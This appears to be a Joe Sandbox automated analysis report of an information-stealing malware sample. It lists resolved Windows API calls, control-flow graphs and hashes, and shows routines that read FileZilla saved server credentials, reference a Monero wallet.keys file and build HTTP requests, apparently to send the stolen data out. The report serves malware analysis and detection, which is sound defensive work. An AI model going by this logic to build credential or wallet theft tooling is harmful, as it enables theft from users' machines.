                                    • GetProcAddress.KERNEL32(75900000,013ACE40), ref: 00199845
                                    • GetProcAddress.KERNEL32(75900000,013ACFA8), ref: 0019985D
                                    • GetProcAddress.KERNEL32(75900000,013ACEE8), ref: 00199876
                                    • GetProcAddress.KERNEL32(75900000,013ACE58), ref: 0019988E
                                    • GetProcAddress.KERNEL32(75900000,013ACF30), ref: 001998A6
                                    • GetProcAddress.KERNEL32(75900000,013ACF00), ref: 001998BF
                                    • GetProcAddress.KERNEL32(75900000,013ACF48), ref: 001998D7
                                    • GetProcAddress.KERNEL32(75900000,013AC9A8), ref: 001998EF
                                    • GetProcAddress.KERNEL32(75900000,013ACA80), ref: 00199908
                                    • GetProcAddress.KERNEL32(75900000,013A9DB8), ref: 00199920
                                    • GetProcAddress.KERNEL32(75900000,013AC870), ref: 00199938
                                    • GetProcAddress.KERNEL32(75900000,013AC8D0), ref: 00199951
                                    • GetProcAddress.KERNEL32(75900000,01396540), ref: 00199969
                                    • GetProcAddress.KERNEL32(75900000,013AC918), ref: 00199981
                                    • GetProcAddress.KERNEL32(75900000,013963E0), ref: 0019999A
                                    • GetProcAddress.KERNEL32(75900000,013AC9F0), ref: 001999B2
                                    • GetProcAddress.KERNEL32(75900000,013AC828), ref: 001999CA
                                    • GetProcAddress.KERNEL32(75900000,013965A0), ref: 001999E3
                                    • GetProcAddress.KERNEL32(75900000,01396420), ref: 001999FB
                                    • LoadLibraryA.KERNEL32(013ACA20,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A0D
                                    • LoadLibraryA.KERNEL32(013AC900,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A1E
                                    • LoadLibraryA.KERNEL32(013AC9C0,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A30
                                    • LoadLibraryA.KERNEL32(013AC840,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A42
                                    • LoadLibraryA.KERNEL32(013ACAE0,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A53
                                    • LoadLibraryA.KERNEL32(013AC960,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A65
                                    • LoadLibraryA.KERNEL32(013AC978,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A77
                                    • LoadLibraryA.KERNEL32(013ACAC8,?,00195783,001A0AD2,?,?,?,?,?,?,?,?,?,?,001A0ACF,001A0ACE), ref: 00199A88
                                    • GetProcAddress.KERNEL32(75FD0000,01396840), ref: 00199AAA
                                    • GetProcAddress.KERNEL32(75FD0000,013AC888), ref: 00199AC2
                                    • GetProcAddress.KERNEL32(75FD0000,013A8AC0), ref: 00199ADA
                                    • GetProcAddress.KERNEL32(75FD0000,013AC858), ref: 00199AF3
                                    • GetProcAddress.KERNEL32(75FD0000,01396700), ref: 00199B0B
                                    • GetProcAddress.KERNEL32(734B0000,0139B220), ref: 00199B30
                                    • GetProcAddress.KERNEL32(734B0000,013969E0), ref: 00199B49
                                    • GetProcAddress.KERNEL32(734B0000,0139B298), ref: 00199B61
                                    • GetProcAddress.KERNEL32(734B0000,013AC990), ref: 00199B79
                                    • GetProcAddress.KERNEL32(734B0000,013AC8A0), ref: 00199B92
                                    • GetProcAddress.KERNEL32(734B0000,013966C0), ref: 00199BAA
                                    • GetProcAddress.KERNEL32(734B0000,01396740), ref: 00199BC2
                                    • GetProcAddress.KERNEL32(734B0000,013AC8B8), ref: 00199BDB
                                    • GetProcAddress.KERNEL32(763B0000,01396860), ref: 00199BFC
                                    • GetProcAddress.KERNEL32(763B0000,01396940), ref: 00199C14
                                    • GetProcAddress.KERNEL32(763B0000,013ACA08), ref: 00199C2D
                                    • GetProcAddress.KERNEL32(763B0000,013ACAB0), ref: 00199C45
                                    • GetProcAddress.KERNEL32(763B0000,01396760), ref: 00199C5D
                                    • GetProcAddress.KERNEL32(750F0000,0139B2C0), ref: 00199C83
                                    • GetProcAddress.KERNEL32(750F0000,0139B310), ref: 00199C9B
                                    • GetProcAddress.KERNEL32(750F0000,013AC9D8), ref: 00199CB3
                                    • GetProcAddress.KERNEL32(750F0000,01396960), ref: 00199CCC
                                    • GetProcAddress.KERNEL32(750F0000,013967A0), ref: 00199CE4
                                    • GetProcAddress.KERNEL32(750F0000,0139B018), ref: 00199CFC
                                    • GetProcAddress.KERNEL32(75A50000,013ACA38), ref: 00199D22
                                    • GetProcAddress.KERNEL32(75A50000,013966A0), ref: 00199D3A
                                    • GetProcAddress.KERNEL32(75A50000,013A8B10), ref: 00199D52
                                    • GetProcAddress.KERNEL32(75A50000,013AC8E8), ref: 00199D6B
                                    • GetProcAddress.KERNEL32(75A50000,013ACA50), ref: 00199D83
                                    • GetProcAddress.KERNEL32(75A50000,01396680), ref: 00199D9B
                                    • GetProcAddress.KERNEL32(75A50000,01396780), ref: 00199DB4
                                    • GetProcAddress.KERNEL32(75A50000,013ACA68), ref: 00199DCC
                                    • GetProcAddress.KERNEL32(75A50000,013ACA98), ref: 00199DE4
                                    • GetProcAddress.KERNEL32(75070000,013966E0), ref: 00199E06
                                    • GetProcAddress.KERNEL32(75070000,013ACAF8), ref: 00199E1E
                                    • GetProcAddress.KERNEL32(75070000,013AC930), ref: 00199E36
                                    • GetProcAddress.KERNEL32(75070000,013AC810), ref: 00199E4F
                                    • GetProcAddress.KERNEL32(75070000,013AC948), ref: 00199E67
                                    • GetProcAddress.KERNEL32(74E50000,01396720), ref: 00199E88
                                    • GetProcAddress.KERNEL32(74E50000,013969A0), ref: 00199EA1
                                    • GetProcAddress.KERNEL32(75320000,01396800), ref: 00199EC2
                                    • GetProcAddress.KERNEL32(75320000,013ACC00), ref: 00199EDA
                                    • GetProcAddress.KERNEL32(6F2C0000,01396980), ref: 00199F00
                                    • GetProcAddress.KERNEL32(6F2C0000,01396A00), ref: 00199F18
                                    • GetProcAddress.KERNEL32(6F2C0000,013967C0), ref: 00199F30
                                    • GetProcAddress.KERNEL32(6F2C0000,013ACDF8), ref: 00199F49
                                    • GetProcAddress.KERNEL32(6F2C0000,013967E0), ref: 00199F61
                                    • GetProcAddress.KERNEL32(6F2C0000,01396820), ref: 00199F79
                                    • GetProcAddress.KERNEL32(6F2C0000,013968E0), ref: 00199F92
                                    • GetProcAddress.KERNEL32(6F2C0000,01396880), ref: 00199FAA
                                    • GetProcAddress.KERNEL32(6F2C0000,InternetSetOptionA), ref: 00199FC1
                                    • GetProcAddress.KERNEL32(6F2C0000,HttpQueryInfoA), ref: 00199FD7
                                    • GetProcAddress.KERNEL32(74E00000,013ACDB0), ref: 00199FF9
                                    • GetProcAddress.KERNEL32(74E00000,013A8A20), ref: 0019A011
                                    • GetProcAddress.KERNEL32(74E00000,013ACCD8), ref: 0019A029
                                    • GetProcAddress.KERNEL32(74E00000,013ACC78), ref: 0019A042
                                    • GetProcAddress.KERNEL32(74DF0000,01396920), ref: 0019A063
                                    • GetProcAddress.KERNEL32(6FB80000,013ACBB8), ref: 0019A084
                                    • GetProcAddress.KERNEL32(6FB80000,013969C0), ref: 0019A09D
                                    • GetProcAddress.KERNEL32(6FB80000,013ACB58), ref: 0019A0B5
                                    • GetProcAddress.KERNEL32(6FB80000,013ACB10), ref: 0019A0CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 5666fc30d7c2c4dc63df58e13f3f4be515952f5d610f520e13337c21b31b2d8a
                                    • Instruction ID: 47e15b8c4dac50c42bd1eb9545f33f0324768307cd0fa6c9850f133f365064d6
                                    • Opcode Fuzzy Hash: 5666fc30d7c2c4dc63df58e13f3f4be515952f5d610f520e13337c21b31b2d8a
                                    • Instruction Fuzzy Hash: 71624EB6520200EFC746DFA8EC88D1A3BBEB74E741F51A51AE60AC3674DB349841DF64

                                    Control-flow Graph

                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00187764
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0018776B
                                    • lstrcat.KERNEL32(?,013A94E8), ref: 0018791B
                                    • lstrcat.KERNEL32(?,?), ref: 0018792F
                                    • lstrcat.KERNEL32(?,?), ref: 00187943
                                    • lstrcat.KERNEL32(?,?), ref: 00187957
                                    • lstrcat.KERNEL32(?,013ADE98), ref: 0018796B
                                    • lstrcat.KERNEL32(?,013ADFB8), ref: 0018797F
                                    • lstrcat.KERNEL32(?,013ADF88), ref: 00187992
                                    • lstrcat.KERNEL32(?,013ADEF8), ref: 001879A6
                                    • lstrcat.KERNEL32(?,013ADFF8), ref: 001879BA
                                    • lstrcat.KERNEL32(?,?), ref: 001879CE
                                    • lstrcat.KERNEL32(?,?), ref: 001879E2
                                    • lstrcat.KERNEL32(?,?), ref: 001879F6
                                    • lstrcat.KERNEL32(?,013ADE98), ref: 00187A09
                                    • lstrcat.KERNEL32(?,013ADFB8), ref: 00187A1D
                                    • lstrcat.KERNEL32(?,013ADF88), ref: 00187A31
                                    • lstrcat.KERNEL32(?,013ADEF8), ref: 00187A44
                                    • lstrcat.KERNEL32(?,013AE060), ref: 00187A58
                                    • lstrcat.KERNEL32(?,?), ref: 00187A6C
                                    • lstrcat.KERNEL32(?,?), ref: 00187A80
                                    • lstrcat.KERNEL32(?,?), ref: 00187A94
                                    • lstrcat.KERNEL32(?,013ADE98), ref: 00187AA8
                                    • lstrcat.KERNEL32(?,013ADFB8), ref: 00187ABB
                                    • lstrcat.KERNEL32(?,013ADF88), ref: 00187ACF
                                    • lstrcat.KERNEL32(?,013ADEF8), ref: 00187AE3
                                    • lstrcat.KERNEL32(?,013AE0C8), ref: 00187AF6
                                    • lstrcat.KERNEL32(?,?), ref: 00187B0A
                                    • lstrcat.KERNEL32(?,?), ref: 00187B1E
                                    • lstrcat.KERNEL32(?,?), ref: 00187B32
                                    • lstrcat.KERNEL32(?,013ADE98), ref: 00187B46
                                    • lstrcat.KERNEL32(?,013ADFB8), ref: 00187B5A
                                    • lstrcat.KERNEL32(?,013ADF88), ref: 00187B6D
                                    • lstrcat.KERNEL32(?,013ADEF8), ref: 00187B81
                                    • lstrcat.KERNEL32(?,013AE130), ref: 00187B95
                                    • lstrcat.KERNEL32(?,?), ref: 00187BA9
                                    • lstrcat.KERNEL32(?,?), ref: 00187BBD
                                    • lstrcat.KERNEL32(?,?), ref: 00187BD1
                                    • lstrcat.KERNEL32(?,013ADE98), ref: 00187BE4
                                    • lstrcat.KERNEL32(?,013ADFB8), ref: 00187BF8
                                    • lstrcat.KERNEL32(?,013ADF88), ref: 00187C0C
                                    • lstrcat.KERNEL32(?,013ADEF8), ref: 00187C1F
                                    • lstrcat.KERNEL32(?,013AE198), ref: 00187C33
                                    • lstrcat.KERNEL32(?,?), ref: 00187C47
                                    • lstrcat.KERNEL32(?,?), ref: 00187C5B
                                    • lstrcat.KERNEL32(?,?), ref: 00187C6F
                                    • lstrcat.KERNEL32(?,013ADE98), ref: 00187C83
                                    • lstrcat.KERNEL32(?,013ADFB8), ref: 00187C96
                                    • lstrcat.KERNEL32(?,013ADF88), ref: 00187CAA
                                    • lstrcat.KERNEL32(?,013ADEF8), ref: 00187CBE
                                      • Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020,001A17A0), ref: 00187646
                                      • Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020,00000000), ref: 00187688
                                      • Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020, : ), ref: 0018769A
                                      • Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020,00000000), ref: 001876CF
                                      • Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020,001A17A8), ref: 001876E0
                                      • Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020,00000000), ref: 00187713
                                      • Part of subcall function 00187610: lstrcat.KERNEL32(35BFF020,001A17AC), ref: 0018772D
                                      • Part of subcall function 00187610: task.LIBCPMTD ref: 0018773B
                                    • lstrcat.KERNEL32(?,013AE500), ref: 00187E4B
                                    • lstrcat.KERNEL32(?,013AD458), ref: 00187E5E
                                    • lstrlen.KERNEL32(35BFF020), ref: 00187E6B
                                    • lstrlen.KERNEL32(35BFF020), ref: 00187E7B
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
                                    • String ID:
                                    • API String ID: 928082926-0
                                    • Opcode ID: 5a7459693fffa3f7446d43f787bc8f6441ae70124a7b559387520005633aed99
                                    • Instruction ID: 8712b1d80889f260bedee215cffc7d995c263c8d82192535a3920369e7ebf58e
                                    • Opcode Fuzzy Hash: 5a7459693fffa3f7446d43f787bc8f6441ae70124a7b559387520005633aed99
                                    • Instruction Fuzzy Hash: 283233B6910214ABCB15EBA0DC89DDE773CBB59700F444A99F20AA3090EF75E785CF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 820 190090-190122 call 19a110 call 198880 call 19a2f0 call 19a270 call 19a1d0 * 2 call 19a380 call 19a270 call 19a1d0 call 19a170 call 189a10 842 190127-19012c 820->842 843 190132-190149 call 1988d0 842->843 844 190566-190579 call 19a1d0 call 181550 842->844 843->844 849 19014f-1901af call 19a110 * 4 GetProcessHeap RtlAllocateHeap 843->849 861 1901b2-1901b6 849->861 862 1904ca-190561 lstrlen call 19a170 call 181590 call 194c70 call 19a1d0 call 19a410 * 4 call 19a1d0 * 4 861->862 863 1901bc-1901cd StrStrA 861->863 862->844 865 1901cf-190201 lstrlen call 198380 call 19a270 call 19a1d0 863->865 866 190206-190217 StrStrA 863->866 865->866 867 190219-19024b lstrlen call 198380 call 19a270 call 19a1d0 866->867 868 190250-190261 StrStrA 866->868 867->868 873 19029a-1902ab StrStrA 868->873 874 190263-190295 lstrlen call 198380 call 19a270 call 19a1d0 868->874 876 190339-19034b call 19a4a0 lstrlen 873->876 877 1902b1-190303 lstrlen call 198380 call 19a270 call 19a1d0 call 19a4a0 call 189b10 873->877 874->873 895 1904af-1904c5 876->895 896 190351-190363 call 19a4a0 lstrlen 876->896 877->876 923 190305-190334 call 19a1f0 call 19a380 call 19a270 call 19a1d0 877->923 895->861 896->895 908 190369-19037b call 19a4a0 lstrlen 896->908 908->895 917 190381-190393 call 19a4a0 lstrlen 908->917 917->895 927 190399-1904aa lstrcat * 3 call 19a4a0 lstrcat * 2 call 19a4a0 lstrcat * 3 call 19a4a0 lstrcat * 3 call 19a4a0 lstrcat * 3 call 19a1f0 * 4 917->927 923->876 927->895
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 00198880: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001988AB
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                      • Part of subcall function 00189A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00189A3C
                                      • Part of subcall function 00189A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00189A61
                                      • Part of subcall function 00189A10: LocalAlloc.KERNEL32(00000040,?), ref: 00189A81
                                      • Part of subcall function 00189A10: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 00189AAA
                                      • Part of subcall function 00189A10: LocalFree.KERNEL32(0018148F), ref: 00189AE0
                                      • Part of subcall function 00189A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00189AEA
                                      • Part of subcall function 001988D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001988F2
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,001A0DA6,001A0DA3,001A0DA2,001A0D9F), ref: 001901A2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001901A9
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 001901C5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 001901D3
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 0019020F
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 0019021D
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00190259
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 00190267
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001902A3
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 001902B5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 00190342
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 0019035A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 00190372
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 0019038A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001903A2
                                    • lstrcat.KERNEL32(?,profile: null), ref: 001903B1
                                    • lstrcat.KERNEL32(?,url: ), ref: 001903C0
                                    • lstrcat.KERNEL32(?,00000000), ref: 001903D3
                                    • lstrcat.KERNEL32(?,001A161C), ref: 001903E2
                                    • lstrcat.KERNEL32(?,00000000), ref: 001903F5
                                    • lstrcat.KERNEL32(?,001A1620), ref: 00190404
                                    • lstrcat.KERNEL32(?,login: ), ref: 00190413
                                    • lstrcat.KERNEL32(?,00000000), ref: 00190426
                                    • lstrcat.KERNEL32(?,001A162C), ref: 00190435
                                    • lstrcat.KERNEL32(?,password: ), ref: 00190444
                                    • lstrcat.KERNEL32(?,00000000), ref: 00190457
                                    • lstrcat.KERNEL32(?,001A163C), ref: 00190466
                                    • lstrcat.KERNEL32(?,001A1640), ref: 00190475
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001A0D9E), ref: 001904CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateChangeCloseCreateFindFolderFreeNotificationPathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 2695953057-555421843
                                    • Opcode ID: dd2381fdca455a707a7291fb72e87138062302f62fdb415955a8af691eb10518
                                    • Instruction ID: 6b55a1b56c10deb124e22d884c472d2515da8e1f2272d87e90b2d12517d5106a
                                    • Opcode Fuzzy Hash: dd2381fdca455a707a7291fb72e87138062302f62fdb415955a8af691eb10518
                                    • Instruction Fuzzy Hash: 60D11E76910108ABCF05EBF4DC56EEE773CAF69300F848518F506A7095EF74AA49CBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1099 185150-18527d call 19a170 call 184800 call 198940 call 19a4a0 lstrlen call 19a4a0 call 198940 call 19a110 * 5 InternetOpenA StrCmpCA 1122 18527f 1099->1122 1123 185286-18528a 1099->1123 1122->1123 1124 185290-1853a3 call 198600 call 19a2f0 call 19a270 call 19a1d0 * 2 call 19a380 call 19a2f0 call 19a380 call 19a270 call 19a1d0 * 3 call 19a380 call 19a2f0 call 19a270 call 19a1d0 * 2 InternetConnectA 1123->1124 1125 185914-1859a9 InternetCloseHandle call 198430 * 2 call 19a410 * 4 call 19a170 call 19a1d0 * 5 call 181550 call 19a1d0 1123->1125 1124->1125 1188 1853a9-1853b7 1124->1188 1189 1853b9-1853c3 1188->1189 1190 1853c5 1188->1190 1191 1853cf-185401 HttpOpenRequestA 1189->1191 1190->1191 1192 185907-18590e InternetCloseHandle 1191->1192 1193 185407-185881 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a2f0 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a380 call 19a270 call 19a1d0 call 19a4a0 lstrlen call 19a4a0 lstrlen GetProcessHeap RtlAllocateHeap call 19a4a0 lstrlen call 19a4a0 * 2 lstrlen call 19a4a0 lstrlen 